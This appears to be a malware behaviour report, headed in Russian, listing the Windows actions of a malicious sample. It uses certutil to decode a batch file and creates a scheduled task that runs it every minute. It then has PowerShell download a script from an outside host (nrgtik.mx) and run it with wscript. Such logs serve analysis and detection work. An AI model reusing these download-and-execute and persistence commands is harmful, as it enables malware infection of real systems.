Техническая информация
- <SYSTEM32>\tasks\4newxmvglg
- '<SYSTEM32>\certutil.exe' -f -decode M5sE67wA.bat M5sE67wA.bat
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 1 /tn 4NEwxMVgLG /tr "%TEMP%\M5sE67wA.bat"
- %TEMP%\m5se67wa.bat
- <SYSTEM32>\tasks\4newxmvglg
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\M5sE67wA.bat"' (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {86819533-FE84-4DCB-9495-41A00441353F} S-1-5-21-1238866942-1249195528-555854008-1000:fjwlsq\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\M5sE67wA.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "IWR 'https://nrgtik.mx/wp-content/uploads/wp-content.php' -OutFile '%TEMP%\Y7HmFMAN.js'; schtasks /delete /f /tn 4NEwxMVgLG; wscript %TEMP%\Y7HmFMAN.js"
- '<SYSTEM32>\schtasks.exe' /delete /f /tn 4NEwxMVgLG
- '<SYSTEM32>\wscript.exe' %TEMP%\Y7HmFMAN.js